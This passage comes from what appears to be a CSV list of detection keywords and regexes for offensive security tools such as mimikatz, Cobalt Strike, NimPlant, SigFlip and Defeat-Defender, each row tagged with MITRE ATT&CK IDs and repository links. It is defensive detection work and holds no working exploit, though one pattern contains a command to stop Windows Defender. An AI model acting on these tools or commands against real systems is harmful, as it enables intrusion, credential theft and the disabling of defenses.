Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*Shhmon.csproj*",".{0,1000}Shhmon\.csproj.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","216","36","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*Shhmon.exe*",".{0,1000}Shhmon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Shhmon.exe*",".{0,1000}Shhmon\.exe.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","216","36","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*Shhmon.git*",".{0,1000}Shhmon\.git.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","216","36","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*shinject *",".{0,1000}shinject\s.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*shinject.nim*",".{0,1000}shinject\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*shinject_ex *",".{0,1000}shinject_ex\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center 
for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shit.fuck.org*",".{0,1000}shit\.fuck\.org.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*shmilylty/cheetah*",".{0,1000}shmilylty\/cheetah.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","1","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*shocknawe.py*",".{0,1000}shocknawe\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*Shodan.io*",".{0,1000}Shodan\.io.{0,1000}","offensive_tool_keyword","shodan.io","Shodan is the worlds first search engine for Internet-connected devices.","T1016 - T1597 - T1526 - T1046 - T1087 - T1078 - T1056 - T1018 - 
T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://www.shodan.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shodanp.py*",".{0,1000}shodanp\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*Shoggoth doesn't support x86 PE yet*",".{0,1000}Shoggoth\sdoesn\'t\ssupport\sx86\sPE\syet.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*ShoggothPolyEngine(*",".{0,1000}ShoggothPolyEngine\(.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*ShorSec/DavRelayUp*",".{0,1000}ShorSec\/DavRelayUp.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","495","78","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*ShorSec/DllNotificationInjection*",".{0,1000}ShorSec\/DllNotificationInjection.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","1","17","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z" "*ShorSec/ShadowSpray*",".{0,1000}ShorSec\/ShadowSpray.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*Show-BallonTip.ps1*",".{0,1000}Show\-BallonTip\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Show-BalloonTip.ps1*",".{0,1000}Show\-BalloonTip\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Show-TargetScreen.ps1*",".{0,1000}Show\-TargetScreen\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Show-TargetScreen.ps1*",".{0,1000}Show\-TargetScreen\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*-ShowWindowMode:Hide sc stop WinDefend*",".{0,1000}\-ShowWindowMode\:Hide\ssc\sstop\sWinDefend.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*Show-WMImplantMainMenu*",".{0,1000}Show\-WMImplantMainMenu.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*shspawn x64 *",".{0,1000}shspawn\sx64\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shspawn x86 *",".{0,1000}shspawn\sx86\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shucknt.php*",".{0,1000}shucknt\.php.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is designed to downgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","60","9","2023-10-11T13:50:11Z","2023-01-27T07:52:47Z" "*ShuckNT-main*",".{0,1000}ShuckNT\-main.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. 
It is designed to downgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","60","9","2023-10-11T13:50:11Z","2023-01-27T07:52:47Z" "*ShutdownRepo/pywhisker*",".{0,1000}ShutdownRepo\/pywhisker.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*ShutdownRepo/smartbrute*",".{0,1000}ShutdownRepo\/smartbrute.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ShutdownRepo/smartbrute*",".{0,1000}ShutdownRepo\/smartbrute.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","1","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*sid::add*",".{0,1000}sid\:\:add.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sid::clear*",".{0,1000}sid\:\:clear.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sid::lookup*",".{0,1000}sid\:\:lookup.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sid::modify*",".{0,1000}sid\:\:modify.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sid::patch*",".{0,1000}sid\:\:patch.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sid::query*",".{0,1000}sid\:\:query.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sigflip*/Bof/*",".{0,1000}sigflip.{0,1000}\/Bof\/.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*SigFlip.exe -*",".{0,1000}SigFlip\.exe\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*SigFlip.WinTrustData*",".{0,1000}SigFlip\.WinTrustData.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*SigInject *",".{0,1000}SigInject\s.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*SigInject *.dll*",".{0,1000}SigInject\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*SigLoader *",".{0,1000}SigLoader\s.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*Sigloader *.dll*",".{0,1000}Sigloader\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
